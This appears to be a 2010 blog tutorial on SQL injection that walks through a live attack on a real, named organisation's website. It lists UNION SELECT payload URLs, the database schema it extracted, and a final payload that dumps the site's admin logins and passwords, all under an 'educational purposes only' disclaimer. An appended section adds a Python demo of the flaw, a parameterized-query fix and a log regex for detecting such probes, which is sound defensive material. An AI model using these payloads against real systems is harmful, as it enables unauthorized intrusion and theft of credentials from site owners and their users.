Friday, July 30, 2010

How to use SQL Injection? Best Online Tutorial for SQL Injection

I receive many emails asking how to hack a website using SQL injection, so here is the tutorial on it.
[NOTE: This is for educational purposes only.]

This is a practical tutorial, as long as this .pk site is up!

So let's start. Here is the website on which this live testing was done: http://www.depo.org.pk

Try to find the variables passed to the inner script:

http://www.depo.org.pk/index.php?a=newsdetail&id=1

where id is the variable passing values to the SQL query.

Check whether it is vulnerable or not: put ' in place of 1 as shown below.

depo.org.pk/index.php?a=newsdetail&id='

If it shows an error, then we can apply SQLi on this URL. Now we need to determine the number of columns in the current table.

Increase the number of columns until you get rid of the error 'The used SELECT statements have a different number of columns'.

+1
+1,2
+1,2,3
+1,2,3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8 ... and so on, in order, until the column count is found.

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8

Here (with 8 columns) we get no error.

Here, we used SQL functions directly from the browser, in place of the column placeholders:

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,database(),version(),4,5,6,7,8

database:- depo
version:- 5.0.45-log

------------------------------------------------

Other MySQL functions that can be used in the same way:

user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()

------------------------------------------------

Now we need to know the structure of the victim's MySQL database.

NOTE: MySQL stores information about every table and column in a separate schema called 'information_schema'.

Attach the SQL query '+from+information_schema.tables+where+table_schema=database()' at the end of the column list:

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()

Now we want to fetch the table structure of the database named 'depo':

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()

Table names

admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile

Now it is the columns' turn:

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_schema=database()

Column names

id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two

It's time to fetch the login and password from the admin table:

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8+from+admin
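To show why the walkthrough above works and how the same handler is fixed, here is an added example (not code from the original post or from the site it tests): a constructed SQLite stand-in for the newsdetail script, with the id concatenated into the query the way the vulnerable page must do it, beside a parameterized version, plus a small access-log check for the UNION / information_schema probes used above. The table names and contents are constructed, and concat(login,0x3a,password) is written in SQLite syntax.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed in-memory stand-in for the site's database: a public news
# table read by newsdetail and a private admin table that must never
# reach the page. Sample rows are made up.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE news (id INTEGER, heading TEXT, text TEXT);
CREATE TABLE admin (id INTEGER, login TEXT, password TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'First post');
INSERT INTO admin VALUES (1, 'admin', 'hunter2');
""")

# Assumed shape of the vulnerable handler: the id parameter is pasted
# straight into the SQL text, so a UNION SELECT rides along with it.
def newsdetail_vulnerable(raw_id):
    sql = "SELECT id, heading, text FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()

# Hardened form: the value is bound as a parameter and never parsed as
# SQL. Rejecting non-numeric ids first also gives a clean failure to log.
def newsdetail_safe(raw_id):
    try:
        news_id = int(raw_id)
    except ValueError:
        return []          # not an id at all; nothing to look up
    sql = "SELECT id, heading, text FROM news WHERE id=?"
    return conn.execute(sql, (news_id,)).fetchall()

# Log side: once the query string is URL-decoded, the column-count and
# information_schema probes from the tutorial are easy to flag.
PROBE = re.compile(r"union\s+select|information_schema\.", re.IGNORECASE)

def is_sqli_probe(query_string):
    return bool(PROBE.search(unquote_plus(query_string)))

# The tutorial's final payload, translated to SQLite string concatenation.
PAYLOAD = "-1 union select 1,login||':'||password,3 from admin"
```

Against the concatenated query the payload returns the admin row in place of a news item; against the parameterized one it returns nothing, and the log check flags the request.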

FOR EDUCATIONAL PURPOSES ONLY.
